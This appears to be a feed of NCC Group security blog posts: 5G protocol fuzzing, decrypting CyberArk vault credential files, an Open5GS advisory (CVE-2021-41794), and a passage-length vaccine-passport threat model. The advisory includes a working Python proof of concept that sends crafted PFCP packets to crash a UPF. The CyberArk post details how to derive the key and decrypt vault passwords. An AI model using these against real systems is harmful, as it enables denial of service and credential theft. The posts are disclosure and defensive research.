[8] – https://min.io/

The Challenges of Fuzzing 5G Protocols

11 October 2021 at 17:30

If you have ever looked at fuzzing in any depth you will quickly realize it’s not as trivial as it first appears.

There are many different types of fuzzers, but here we are focused on network fuzzers.  These fuzzers are of particular interest as they are most suited to fuzzing telecoms products/protocols, where the application and source code are generally not available.  There are very few fuzzer options when the input to these applications is via network sockets instead of the more traditional command line interface.

In this blog we will cover some basic background of fuzzing, before diving into the specifics of trying to fuzz telecoms 5G protocols using both proprietary and open source fuzzers.  We will aim to assess these fuzzers for their suitability to fuzz 5G network protocols.  We will end this post with a comparison of the fuzzers, some of the findings, and a general conclusion regarding the fuzzing of 5G telecoms protocols.

The focus of this research is on the use of the different fuzzers with regard to 5G telecoms protocols and not the specific vulnerabilities that were found, although one example vulnerability found is cited within.

Background

So, what is fuzzing?  Fuzzing is simply an automated process of sending invalid or random inputs to a program/system under test in an attempt to cause a crash or malfunction.

Fuzzing is not a new technology, however it is becoming more prominent in today’s software development life cycle. It is often used to find vulnerabilities in software that might otherwise be missed by normal unit/system tests. 

While the high-level concept of fuzzing is easy to grasp, the actual implementation of a good fuzzer is significantly more challenging.

The renewed interest in fuzzing has come about due to the increasing complexity of software and the need to effectively test and secure it.  While positive testing is generally more obvious (i.e. testing the software does what it was designed to do), negative testing in normally forgotten about (testing the software handles unexpected input without crashing or malfunctioning).

Traditional fuzzers tend to focus on fuzzing a piece of software and generate inputs via the command line or input files.  Some of the popular continuous integration frameworks (GitLab) are now starting to include fuzzing as part of the continuous integration build pipeline.

Fuzzing network protocols is a little different however, and requires sending input via network ports.  There are typically multiple network protocols involved in any communication and these protocols are layered on top of each other.  Some protocols are stateless, and others have state which adds to the complexity.  Due to the nature of network protocols the System Under Test (SUT) could be either local (on the same physical/virtual machine) or on a remote physical/virtual machine.  These differences add to the challenge of fuzzing a SUT using network protocols.

The next difficulty specific to fuzzing 5G protocols is getting access to a 5G Core or component.  There are two open-source solutions Free5GC and Open5GS which were examined for our testing.  Open5GS was chosen due to it being more stable and easier to install than Free5GC.  Neither of these solutions are commercial grade but they do give a reasonable test target to fuzz for free.

We also need some network fuzzers…

Meet the Fuzzers

One in-house, and two open-source network protocol fuzzers were used for testing: Fuzzowski 5GC, Frizzer2, and AFLNet3.  They all have completely different approaches to fuzzing from the generation of the test cases to the feedback on progress made.

Fuzzowski1 was chosen as it had previously been used to fuzz network printer protocols and was developed by NCC Group from the open-source project BooFuzz4.  Fuzzowski is open source, however the modified version used here for fuzzing 5G is not currently an open-source project.

Frizzer is a black box fuzzer that uses dynamic binary instrumentation to give coverage feedback to guide the fuzzer.  No source code or recompilation of the SUT is needed.

AFLNet was used as a comparison due to the reputation of AFL being a well-used fuzzer with proven results.  AFLNet builds on top of AFL to perform network fuzzing and track state changes using the network responses.

Fuzzowski 5GC

Fuzzowski 5GC is a template based mutational/generational fuzzer.  This simply means that the format of the input is specified, and the values defined within the format are mutated using selected algorithms depending upon the data type.

Fuzzowski 5GC can fuzz sequences of messages however it has no concept of state.  As Fuzzowski 5GC is aware of the data structure being fuzzed, it can fix checksums and length fields which helps avoid early parsing errors that would prevent testing of deeper parts of the protocol stack.

Fuzzowski 5GC is a black box fuzzer meaning it has no knowledge of the SUT other than the network API.

Frizzer

Frizzer is a black box guided mutational based fuzzer.  It uses example input and randomly mutates it using Radamsa7.  It uses Frida6 to dynamically instrument the SUT to provide code coverage feedback.

AFLNet

AFLNet is a guided mutational based fuzzer.  It uses example input and randomly mutates part of the input based on different mutation algorithms.  It has no knowledge of the input data format and uses state feedback from the network messaging to guide the fuzzing process.

AFLNet is a grey box fuzzer as it uses source code instrumentation to generate the code coverage feedback.

The Test Environment

For testing the fuzzers an ubuntu environment running Open5GS5 was used.

Open5GS is an open-source implementation of a 5G Core and EPC written using the C language.  Open5GS was chosen to emulate the 5G core as it is freely available and actively being maintained.  Due to it not being a commercial product and written in C, it makes an ideal target for fuzzing as it is unlikely to be as thoroughly tested.  It is also more likely to be focused primarily on functionality, rather than security.

As the protocol specifications are the same for both open source and commercial products, the network message formats should be representative of a real 5G Core network. We chose to limit the scope of testing to look at the NGAP, GTPU, PFCP, and DIAMETER protocols, which we will explain briefly below.

All the fuzzers were tested against the AMF component of the Open5GS software to fuzz the more complex NGAP protocol. The theory being that as one of the more complex 5G protocols, it has a higher probability of bugs – however, it is also more difficult to fuzz as a result of its complexity.

Fuzzowski 5GC was also tested against other 5G components to fuzz the GTPU, PFCP and DIAMETER protocols.

Finding vulnerabilities in these protocols and their implementation can lead to various types of attack scenarios such as denial of service, privilege escalation, remote code execution, user information disclosure and capture.

GTPU

GPRS Tunneling User Data Protocol (GTPU) is effectively a relatively simple IP based tunnelling protocol, which can have many tunnels between each set of end points.  It is used to tunnel user plane data between different network nodes.  In our testing this is the N3 interface between gNB and UPF.

PFCP

Packet Forwarding Control Protocol (PFCP) facilitates the establishment, modification, and deletion of Sx sessions within the user plane function.  PFCP rules which are passed from the control plane function to the user plane function include things like Packet Detection Rule (PDR), QoS Enforcement Rule (QER), Buffering Action Rule (BAR) etc.  In our testing this is the N4 interface between the UPF and SMF.

DIAMETER

DIAMETER is an authentication, authorization and accounting protocol and is an application layer protocol.  The base protocol can be extended by adding new commands and/or attributes.  In our testing this is the S6a interface between the MME and HSS.  The DIAMETER S6a interface allows for mobile device related location information and subscriber management information between MME and HSS.

NGAP

Next Generation Application Protocol (NGAP) supports both UE and non-UE associated services.  It includes operations such as configuration updates, UE context transfer, PDU session resource management and also support for mobility procedures.  In our testing this is the N2 interface between the AMF and gNB.

Fuzzing Results

Fuzzowski 5GC found several issues with GTPU, PFCP and DIAMETER but failed to find anything for the NGAP protocol.

Frizzer and AFLNet were only run against a subset of the 5G protocols and found some issues which at time of writing are under further investigation and, as appropriate, coordinated disclosure.

The types of crashes that can be observed in these targets could cause loss of service for subscribers of the network, preventing them from connecting to the network (denial of service), or potentially other security implications if stack/heap corruptions can be exploited to execute code or gain privileged access.

The following is an example crash caused while fuzzing the GTPU/PFCP protocols using Fuzzowski 5GC. This bug has now been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

In the next section, we’ll discuss this bug in more depth, but also share the associated Technical Advisory and CVE details below:

PFCP Bug (CVE-2021-41794)

This shows a stack corruption caused by the function ‘ogs_fqdn_parse’ writing beyond the end of the ‘dnn’ character buffer which is defined on the stack as 100 characters (OGS_MAX_DNN_LEN = 100). If ‘message->pdi.network_instance.data’ contains the value ‘internet’ for example, it causes stack corruption to occur.

There are a few issues with the function ‘ogs_fqdn_parse’. The first is the calculation of the variable ‘len’ which is being set to the value of the first character in the ‘src’ parameter. In this example it is the lower case letter ‘i’ which equates to the numerical value 105. The length of the ‘src’ parameter is 8, however this is not checked until it’s too late. The memcpy reads past the end of the ‘src’ parameter and also writes beyond the end of the ‘dst’ parameter (which is actually the variable ‘dnn’ on the stack).

As the ‘src’ parameter is ultimately coming from the PFCP Session Establishment Request it could be manipulated to contain any value and the length controlled by setting the first byte.

Comparative Performance of the Selected Fuzzers

Fuzzowski 5G

Fuzzowski 5GC proved to be good at finding bugs in state less protocols, however various modifications were made to Fuzzowski 5GC in an attempt to fuzz the NGAP protocol.

The biggest issue with using Fuzzowski 5GC is that it needs the structure of the messages to be defined.  Creating message definitions, sequences, and functionality to handle message sequences is a slow and manual process.  The messages are generally created from WireShark captures and therefore tend not to cover all parts of the protocol specification (e.g., optional elements).

Frizzer

Frizzer was easy to setup as the source code was available for the SUT.  If there had been no source code, some reverse engineering would be required to find the function/address of the network processing section of the application.

The SCTP protocol was added to Frizzer so that it could connect to the AMF.  It was also modified to keep the SCTP connection open between tests as the AMF would fail otherwise.

As frizzer uses Frida6 to dynamically instrument the binary there is no need for special compilation of the application, as required with AFLNet.

Frizzer has the same issues as AFLNet regarding checksums, although it may be possible to use Frida6 to dynamically change the execution path of the SUT and force checksum calculations to pass.

Frizzer testing was limited as without fixing a bug in the AMF the testing kept stopping after a few hundred test cases.

AFLNet

AFLNet required a reasonable amount of work to setup.  The program defaults were not suitable for our testing purposes, so they were overridden on the command line.  The SCTP protocol was added to the connection types to prevent the SCTP protocol from being fuzzed.

For AFLNet to function the SUT needs to be compiled with instrumentation.  To compile the AMF application, the build process for Open5GS was modified to instrument the code.  Due to the AMF application being initialized for every test by AFLNet, the process of fuzzing was very slow compared to the other fuzzers.

Because of the slow speed of fuzzing, minimal time and effort was spent to enable fuzzing of a single NGAP message.  The mutational nature of AFLNet means it would not be very effective at dealing with length and checksum parameters, making it difficult for it to explore the deeper parts of the protocol.

What We Learnt by Fuzzing 5G Protocols

This research shows that fuzzing 5G telecoms protocols is not as straightforward as downloading your favorite open source fuzzer and hitting go!  Sure, they might find a few bugs in the simple stateless protocols, but they fail to find those deeper, harder to reach issues. Fuzzing 5G protocols introduces specific challenges, such as the need for binary instrumentation of commercial 5G components for which source code is unavailable.

A good starting point for any telecoms fuzzer would be to create input from the ASN1 definitions of the protocols. This would make it easier to create test cases for specific versions of protocols, and give better coverage of the protocol compared to manually defining the input.  It would also be quicker and a lot less error prone to produce the test cases.  This approach would require writing an ASN1 parser which could generate suitable output for use with the fuzzer (a reasonable challenge in itself).

It is unlikely that source code would be available when testing a commercial 5G component.  For this reason, binary instrumentation would greatly help in guiding a fuzzer.  It is possible to use tools like Frida6 to instrument the SUT to give coverage feedback similar to AFL.

Monitoring for crashes is more challenging as the SUT may be on a remote server.  A monitoring application would need to run on the same server as the SUT to feed status information back to the fuzzer.  As Frida6 runs in the target process it could be used for monitoring as well as providing other feedback.

Another issue encountered is unexpected messages.  Some 5G protocols (e.g., NGAP) repeatedly send requests at timed intervals if an invalid response is received.  This causes problems for fuzzers like Fuzzowski 5GC which has a predefined message sequence.  Issues such as this render Fuzzowski 5GC less effective when testing a real system (these messages were disabled during our testing for the open-source products).

There are very few companies offering network fuzzers for 5G protocols and it is easy to see why.  Some fuzzers are more costly and require long testing cycles with complex configuration.  All this extra time and complexity, eats into any development cycle especially if deadlines are tight.  Outsourcing security testing particularly if a business is not resourced to conduct assessments to certain levels of accreditation, is key to easing this burden.

The Catalogue of General Security Assurance Requirements (3GPP TS 33.117 version 16.5.0 Release 16) contains a section on Robustness and Fuzz Testing with more and more operators, regulators and accreditation bodies requiring thorough fuzzing and testing of 5G components in the coming years.  To satisfy these requirements, it is clear a combination of fuzzing tools and techniques are required.

Fuzzowski 5G Modifications

A lot of work has been put into improving Fuzzowski to create our proprietary version for 5G protocols, Fuzzowski 5GC.  The following is a high-level list of functionality/fixes that have been added to the publicly available Fuzzowski1:

  • Global/Local JSON configuration files
  • Variables for requests
  • Groups to fuzz sections of a request with a set of specific values
  • Setup/Teardown for each testcase (used in GTPU fuzzer to setup GTP tunnel)
  • SCTP connections
  • HTML documentation
  • Render option to output byte stream for a request to help with debug
  • Help option to display all available options
  • Added receive strategy
  • Added more test cases to validate functionality
  • Protocols added: GTPU, PFCP, DIAMETER, SIP, NGAP/NAS
  • Lots of bug fixes and code improvements

Glossary

Term Description
SUT System Under Test
AMF Access and Mobility Management Function
UPF User Plane Function
Fuzzer Software that generates invalid input for testing applications
Coverage Guided Source code is instrumented to give source code coverage metrics to help guide the fuzzer to generate data that uncovers new execution paths within the source code.
Generational Template Fuzzing   Uses a predefined template to specify the structure of the data and then generates invalid data using an algorithm.
MME Mobility Management Entity
HSS Home Subscriber Server
gNB New Radio Node B
ASN1 Abstract Syntax Notation One (ASN.1)

References

[1] GitHub – nccgroup/fuzzowski: the Network Protocol Fuzzer that we will want to use.

[2] GitHub – demantz/frizzer: Frida-based general purpose fuzzer

[3] GitHub – aflnet/aflnet: AFLNet: A Greybox Fuzzer for Network Protocols

[4] GitHub – jtpereyda/boofuzz: A fork and successor of the Sulley Fuzzing Framework

[5] GitHub – open5gs/open5gs: Open5GS is an Open Source implementation for 5G Core and EPC

[6] Frida – A world-class dynamic instrumentation framework

[7] GitLab – Aki Helin / radamsa

How To Work with Us on Commercial Telecommunications Security Testing

NCC Group has performed cybersecurity audits of telecommunications equipment for both small and large enterprises. We have experts in the telecommunications field and work with world-wide operators and vendors on securing their networks. NCC Group regularly undertake assessments of 3G/4G/5G networks as well as providing detailed threat assessments for clients. We have the consultant base who can look at the security threats in detail of your extended enterprise equipment, a mobile messaging platform or perhaps looking in detail at a vendor’s hardware. We work closely with all vendors and have extensive knowledge of each of the major vendor’s equipment.

NCC Group is at the forefront of 5G security working with network equipment manufacturers and operators alike. We have the skills and capability to secure your mobile network and provide unique insights into vulnerabilities and exploit vectors used by various attackers. Most recently, we placed first in the 5G Cyber Security Hack 2021 Ericsson challenge in Finland.

NCC Group can offer proactive advice, security assurance, incident response services and consultancy services to help meet your security needs.

If you are an existing customer, please contact your account manager, otherwise please get in touch with our sales team.

Reverse engineering and decrypting CyberArk vault credential files

8 October 2021 at 08:00

Author: Jelle Vergeer

This blog will be a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. I discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password. I also provide a python implementation to decrypt the contents of the files.

Introduction

It was a bit more than a year ago that we did a penetration test for a customer where we came across CyberArk. During the penetration test we tested the implementation of their AD tiering model and they used CyberArk to implement this. During the penetration test we were able to get access to the CyberArk Privileged Session Manager (PSM) server. We found several .cred CyberArk related files on this server. At the time of the assignment I suspected the files were related to accessing the CyberArk Vault. This component stores all passwords used by CyberArk. The software seemed to be able to access the vault using the files with no additional user input necessary. These credential files contain several fields, including an encrypted password and an “AdditionalInformation” field. I immediately suspected I could reverse or break the crypto to recover the password, though the binaries were quite large and complex (C++ classes everywhere).

A few months later during another assignment for another customer we again found CyberArk related credential files, but again, nobody knew how to decrypt them. So during a boring COVID stay-at-home holiday I dove into the CreateCredFile.exe binary, used to create new credential files, and started reverse engineering the logic. Creating a dummy credential file using the CreateCredFile utility looks like to following:

This image has an empty alt attribute; its file name is image.png
Creating a new credential file with CreateCredFile.exe
This image has an empty alt attribute; its file name is image-1-1024x224.png
The created test.cred credential file

The encryption and key generation algorithms

It appears there are several types of credential files (Password, Token, PKI, Proxy and KeyPair). For this exercise we will look at the password type. The details in the file can be encrypted using several algorithms:

  • DPAPI protected machine storage
  • DPAPI protected user storage
  • Custom

The default seemed to be the custom one, and after some effort I started to understand the logic how the software encrypts and decrypts the password in the file. The encryption algorithm is roughly the following:

First the software generates 20 random bytes and converts this to a hexadecimal string. This string is stored in the internal CCAGCredFile object for later use. This basically is the “AdditionalInformation” field in the credential files. When the software actually enters the routine to encrypt the password, it will generate a string that will be used to generate the final AES key. I will refer to this string as the base key. This string will consist of the following parts, appended together:

  • The Application Type restriction, converted to lower case, hashed with SHA1 and base64 encoded.
  • The Executable Path restriction, converted to lower case.
  • The Machine IP restriction.
  • The Machine Hostname restriction, converted to lower case.
  • The OS Username restriction, converted to lower case.
  • The 20 random bytes, or AdditionalInformation field.
This image has an empty alt attribute; its file name is image-2.png
An example base string that will be used to generate the AES key

Note that by default, the software will not apply the additional restrictions, only relying on the additional info field, present in the credential files. After the base key is generated, the software will generate the actual encryption key used for encrypting and decrypting credentials in the credential files. It will start by creating a SHA1 context, and update the context with the base key. Next it will create two copies of the context. The first context is updated with the integer ‘1’, and the second is updated with the integer ‘2’, both in big endian format. The finalized digest of the first context serves as the first part of the key, appended by the first 12 bytes of the finalized second digest. The AES key is thus 32 bytes long.

When encrypting a value, the software generates some random bytes to use as initialization vector (IV) , and stores the IV in the first block of encrypted bytes. Furthermore, when a value is encrypted, the software will encrypt the value itself, combined with the hash of the value. I assume this is done to verify the decryption routine was successful and the data is not corrupted.

Decrypting credential files

Because, by default, the software will only rely on the random bytes as base key, which are included in the credential file, we can generate the correct AES key to decrypt the encrypted contents in the file. I implemented a Python utility to decrypt CyberArk Credential files and it can be downloaded here. The additional verification attributes the software can use to include in the base key can be provided as command line arguments to the decryption tool. Most of these can be either guessed, or easily discovered, as an attacker will most likely already have a foothold in the network, so a hostname or IP address is easily uncovered. In some cases the software even stores these verification attributes in the file as it asks to include the restrictions in the credential file when creating one using the CreateCredFile.exe utility.

This image has an empty alt attribute; its file name is image-3-1024x368.png
Decrypting a credential file using the decryption tool.

Defense

How to defend against attackers from decrypting the CyberArk vault password in these credential files? First off, prevent an attacker from gaining access to the credential files in the first place. Protect your credential files and don’t leave them accessible by users or systems that don’t need access to them. Second, when creating credential files using the CreateCredFile utility, prefer the “Use Operating System Protected Storage for credentials file secret” option to protect the credentials with an additional (DPAPI) encryption layer. If this encryption is applied, an attacker will need access to the system on which the credential file was generated in order to decrypt the credential file.

Responsible Disclosure

We reported this issue at CyberArk and they released a new version mitigating the decryption of the credential file by changing the crypto implementation and making the DPAPI option the default. We did not have access to the new version to verify these changes.

Timeline:

20-06-2021 – Reported issue at CyberArk.
21/23/27/28-06-2021 – Communication back and forth with questions and explanation.
29-06-2021 – Call with CyberArk. They released a new version which should mitigate the issue.

Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)

6 October 2021 at 15:07
Vendor: Open5GS
Vendor URL: https://github.com/open5gs/open5gs
Versions affected: 1.0.0 to 2.3.3
Systems Affected: Linux
Author: mark.tedman[at]nccgroup[dot]com
Advisory URL / CVE Identifier: CVE-2021-41794
Risk: CVSSv3.1: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)

Summary

When connecting to the UPF port for the PFCP protocol (8805) and sending an Association Setup Request followed by a Session Establishment Request with a PDI Network Instance set to ‘internet’, it causes a stack corruption to occur.

Impact

Exploitation of this vulnerability would lead to denial of service for the subscriber’s equipment.

Details

Sending a PFCP Association Setup followed by a PFCP Session Establishment Request with the settings detailed below is enough to cause the stack overflow.  The issue is caused by the function ogs_fqdn_parse in the file lib/core/ogs-3gpp-types.c calculating a length value used in a memcpy without validating it.

Directly affected files:

  • Function: ogs_fqdn_parse in /lib/core/ogs-3gpp-types.c
  • /lib/nas/5gs/ies.c
  • /lib/nas/eps/ies.c
  • /lib/pfcp/handler.c
  • /lib/pfcp/types.c
  • /lib/sbi/nnrf-handler.c
  • /src/mme/sgsap-handler.c
  • /src/sgwc/s11-handler.c
  • /src/smf/context.c

The following python script can be used to replicate the issue:

#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(1.0)

pfcp_association_setup_req = b'\x20\x05\x00\x1a\x00\x00\x01\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x60\x00\x04\x5f\xf4\x38\x25\x00\x59\x00\x01\x00'

pfcp_session_establishment_req = b'\x21\x32\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x39\x00\x0d\x5a\x00\x00\x00\x00\x00\x00\x00\x01\xc0\xa8\x3f\x88\x00\x01\x00\x46\x00\x38\x00\x02\x00\x01\x00\x1d\x00\x04\x1f\x00\x00\x00\x00\x02\x00\x27\x00\x14\x00\x01\x00\x00\x15\x00\x09\x01\x00\x00\x00\x0a\xc0\xa8\x3f\x88\x00\x16\x00\x08\x69\x6e\x74\x65\x72\x6e\x65\x74\x00\x5d\x00\x05\x02\x2d\x2d\x00\x02\x00\x5f\x00\x01\x00\x00\x6c\x00\x04\x00\x00\x00\x01\x00\x01\x00\x34\x00\x38\x00\x02\x00\x02\x00\x1d\x00\x04\x1f\x00\x00\x00\x00\x02\x00\x1a\x00\x14\x00\x01\x01\x00\x16\x00\x08\x69\x6e\x74\x65\x72\x6e\x65\x74\x00\x5d\x00\x05\x06\x2d\x2d\x00\x02\x00\x6c\x00\x04\x00\x00\x00\x02\x00\x03\x00\x16\x00\x6c\x00\x04\x00\x00\x00\x01\x00\x2c\x00\x01\x02\x00\x04\x00\x05\x00\x2a\x00\x01\x01\x00\x03\x00\x24\x00\x6c\x00\x04\x00\x00\x00\x02\x00\x2c\x00\x01\x02\x00\x04\x00\x13\x00\x2a\x00\x01\x00\x00\x54\x00\x0a\x01\x00\x00\x00\x00\x0a\xc0\xa8\x3f\x88\x00\x71\x00\x01\x01'

sock.sendto(pfcp_association_setup_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.sendto(pfcp_session_establishment_req, ('127.0.0.7', 8805))
try:
   sock.recv(65535)
except Exception as ex:
   print(f"Receive failed: {ex}")

sock.close()

Recommendation

The function ogs_fqdn_parse needs to correctly calculate/validate the length used in the memcpy function.  This has been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).

Users should update to the most recent version 2.3.4 or above of Open5GS.

Vendor Communication

29/09/2021: Initial email sent to Open5GS
29/09/2021: Open5GS replied with PGP Key
30/09/2021: Sent Technical Advisory to Open5GS
30/09/2021: Technical Advisory received by Open5GS
01/10/2021: Bug fixed by Open5GS
06/10/2021: Open5GS version 2.3.4 released - fixes bug

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  06/10/2021

Written by:  Mark Tedman

Assessing the security and privacy of Vaccine Passports

4 October 2021 at 20:05

There has been a lot of development lately in the field of health credentials, especially in the field of vaccine credentials. This has largely been driven by a perceived need to track and validate an individual’s vaccination status with respect to COVID-19.

This post attempts to explore the security and privacy concerns related with vaccine credential systems, by way of threat modelling and exploring the various risks and attacks conceivable against such systems. There are other concerns about these systems apart from security and privacy, mainly in the social and political realm; those issues are best left discussed by others, and we’ll restrict treatment to technical topics and attacks here. Furthermore, we’ll look at these concerns through the lens of the users of the system, rather than the maintainers of such systems – i.e from the perspective of end users looking to prove their vaccination status, and businesses or entities looking to validate said credentials. Essentially, just the public-facing parts of the system.

General overview

There are many vaccine credential systems (VCS) currently in use around the world. Many share a common format as a base for credential (such as CommonPass), while others have gone their own way in defining what a vaccine credential is. Quite a few of these initiatives are planning for going beyond the immediate need for COVID-19 vaccination tracking, branding themselves as a “smart health card” (like https://smarthealth.cards/) encompassing a broader range of health and vaccination information.

For the purposes of this exercise, we assume a simple vaccine credential system with a few defined entities. These entities include:

  • End-user: The individual trying to acquire a vaccine credential (VaxCred), which proves their COVID-19 vaccination or test status
  • Vaccination lab (VaxLab): The entity or organization that performs COVID-19 vaccination and/or SARS-CoV-2 tests and stores the result in a health backend
  • Health backend: A system that stores vaccination and test results from vaccination labs, and makes them available to the health site.
  • Health site/mobile app (HealthSite or HealthApp): The user-facing website or mobile application an end-user uses to acquire, and possibly store and display, a vaccine credential from the health backend
  • Scanner app (ScannerApp): An application that businesses or entities use to validate a vaccine credential

A generalized flow of such systems usually proceeds in the following manner:

  • End-user approaches a Vaccination lab, proves their identity to the vaccination lab, and acquires a vaccination/test
  • VaxLab communicates/stores result to health backend
  • End-user authenticates to HeathApp and acquires a VaxCred
  • End-user presents VaxCred to an entity (such as an event venue or restaurant) requiring proof of vaccination, who uses a ScannerApp to validate authenticity of their vaccine credential
  • End-user gains access to venue/physical event space on successful validation of their vaccine credential

We assume that the vaccination lab, health backend and HealthApp trust each other, can communicate securely, and store user identity and vaccination status securely. In practice, there may be many discrete labs or organizations communicating vaccine administration information to a public health authority or health backend. Since these interfaces are not generally publicly exposed, we omit discussions about securing these systems in this post.

Understanding Potential Security Threats

We break down possible security threats and concerns by phases of the interaction, namely identifying the vaccine credential system, vaccine credential acquisition, and finally, usage of the vaccine credential to prove vaccination status.

Phase 1: Identifying and trusting a vaccine credential

So far, there is no singular, standard vaccine credential system commonly used or accepted globally, and their use and acceptance varies widely across geographies and purposes. For instance, the NYS Excelsior Pass is used in New York State, whereas EU’s Digital Green certificate is more in use in the European Union. Non-government systems like IATA’s Travel Pass are used by member airlines for certain flight segments. The selection of which vaccine credential system (VCS) to use is largely dependent on the requirements of the particular activity a user wishes to engage in, and generally isn’t a choice for the user. This means an individual might have to be simultaneously enrolled in multiple VCS and have different vaccine credentials to satisfy the requirements of different entities.

Since there is no real “choice” for the end user on which VCS to use, being dependent on the context it is needed, identification of which VCS to use often becomes moot. For instance, let’s say New York State mandates use of the Excelsior Pass as validation to enter a concert venue, and users are expected to acquire a credential before reaching the venue. Users couldn’t really select another VCS as that would not be acceptable proof. the The concert organizers may share a link to the legitimate NYS Excelsior Pass app/website, making finding the the legitimate site easy for end users. There is a small likelihood of a user searching for the VCS themselves, either online on the web or on mobile app stores, and ending up on a rogue site or app seeking to harvest their personal information. This is hardly a non-zero chance possibility, and a quick search on iOS and Android app stores already shows a number of apps which claim to be “vaccine credential passports” and “health credential vaults”, but seem of sketchy provenance.

It’s worth mentioning that – like so many internet-based software systems people have for the last several years been required to use to participate in anything from electronically filing their income taxes, to ordering pizza online from their favorite pizza shop, to car registration, to the purchase of event tickets for many theatres and sports games – this lack of choice means that users are forced to accept privacy and data sharing policies of the specific VCS, without having a say in the matter (other than opting out entirely in participating in the activity that relies upon this system). This is an opportunity of VCS administrators to inspire trust in users by having clearly defined, restrictive privacy policies that reassures users of the privacy and security of their data. Vaccine credentials systems which follow principles of data minimization (i.e. limiting data collection and disclosure to the minimum required to fulfill a specific purpose) are more likely to be trusted and adopted by users.

Phase 2: Acquiring a vaccine credential

Once a user has identified a legitimate health website or mobile app VCS, they would look to actually acquiring a vaccine credential. This is usually done by providing authentication data to the HealthSite to validate the user’s identity. Authentication information may include government-issued identifiers, such as the health insurance number for some systems in Canada and a NemID for Denmark’s Coronapas, or identity verification questions such as for New York State’s Excelsior Pass.

Cybersecurity considerations for vaccine credential acquisition are listed below.

  • Security of the connection between the HealthApp and HealthSite: Does the website/application use HTTPS with modern ciphers? Can an attacker eavesdrop or intercept communications between the user’s device and the HealthSite and obtain personal information or vaccination status?
  • Authentication to HealthSite: How does the HealthSite verify my identity before producing a vaccine credential for me? Can an attacker impersonate someone else and acquire a credential for them? Does the HealthSite inadvertently let an individual ascertain someone else’s vaccination status without their consent, or leverage an information leak that lets them acquire non-public information about another user?
  • General application security concerns on the HealthSite: Is the HealthSite and supporting infrastructure built with security in mind? Is the HealthSite secure against common attacks such as SQL Injection, Server Side Request Forgery, patched server software, etc. which may be leveraged to compromise the HealthSite or HealthApp?
  • Secure storage of the vaccine credential on the user device: Is the vaccine credential stored securely on the user device? Can rogue applications or users on the device gain access to stored credentials? Does the app cache excessive information that may be revealed on compromise of the application?

While these fall under common application security concerns, the secure storage aspect of the vaccine credential is worth going into detail. After all, the vaccine credential is something that will be disclosed to external parties for verification – does it really need to be stored “securely”? The answer is, it depends! Depending on what information these credentials contain, and how they are validated, there might be a host of potential attacks and concerns unless the credential is securely stored, which is determined by how securely the system has been designed and built.

Phase 3: Validation and security of the vaccine credential

Not all vaccine credentials are the same; though many use QR-code representation as a means of providing an easy way to visually display and scan credential information, that is not universally true, and the information they hold can be vastly different. The format of the vaccine credential seems to largely fall under two categories:

  1. A digitally signed object containing vaccination data, often a JSON payload, or
  2. A unique web URL or identifier to an online service that hosts the vaccination information

The Vaccine Credential Initiative’s SMART cards and W3C’s Verifiable Credentials are examples of the former, whereas credentials provided by the Dubai Health Authority are examples of the latter.

There are certain advantages and disadvantages to each approach:

Signed Digital Object:

  • Pros:
    • Signed objects can be validated offline, and the ScannerApp does not require a persistent connection to the health backend to verify credentials
    • If well-designed, contains a limited amount of information and will not reveal more if credential is disclosed
  • Cons:
    • Information cannot be updated on a signed credential once minted; updates to vaccination status require a new credential
    • If disclosure of cryptographic signing key for credential occurs, it allows arbitrary credential forgery and requires reissuing all vaccine credentials and updating ScannerApps

Unique web URL or identifier:

  • Pros:
    • Information referenced by credential can be updated without needing new credentials
    • Individual credentials can be revoked without affecting other credentials or requiring ScannerApp updates
    • Slightly less complicated system to manage; no need to “do cryptography correctly” or manage cryptographic signing keys
  • Cons:
    • Requires ScannerApp to be online and have access to the health backend
    • There is additional attack surface exposed in the form of an endpoint that displays vaccination status, and the connection between the ScannerApp and health backend
    • If disclosed, may grant persistent access to vaccination status and/or health records, if the system has not been designed with URL/identifier expiry or revocation in mind


In both approaches, the amount of information disclosed by a vaccine credential is interesting to note from an end user perspective. If I, as an end user, want or need to use a vaccine credential before entry to a physical space, how much information am I disclosing to someone who scans my credential? If I need to flash my vaccine credential to the bouncer at a bar to gain entry, is that equivalent to me showing them my driver’s license for age verification? Or am I revealing more information than what is displayed in the app? Am I inadvertently sharing my email address, or phone number, or some other part of my medical history?

One would assume information in the vaccine credential includes, at a minimum, the user’s vaccination status, and their full name. Many also include the user’s birthdate, or a government-issued identifier; this is used in conjunction with a photo ID, such as a driver’s license, passport, or other government-issued identification, to prove identity of the individual presenting the vaccine credential. A good design principle seems to be one that adheres to data minimization, as mentioned earlier.

This is especially important when you consider the wide variety of businesses and entities that may scan your vaccine credential and ask for accompanying photo ID; whilst most folks have become comfortable with regularly flashing their driver’s license at bars and airports (and in doing so, disclosing their name, date of birth, and registered physical address, among other details), vaccine credentials may be required at a wider range of physical spaces. This could range from your neighborhood convenience stores and chain retail departments to pop-up event spaces; places that mostly never required identification to enter, but now might require government issued or verified identification.

Furthermore, from the perspective of a business or venue validating vaccine credentials, how much trust should I place on the trustworthiness of the credential presented by a user? Is the presented credential provably trustworthy, or is a forged credential? In other words, what guarantees are provided that the individual presenting the credential is the actual owner of the credential, and the credential is genuine and provides me with an accurate status of the presenter’s vaccination status?

With these systems and concerns in mind, let’s talk about possible attack vectors and threats:

  • Information disclosed by vaccine credential: Does the vaccine credential adhere to principles of data minimization? Does it disclose excessive information beyond what is required to establish identity and vaccination information?
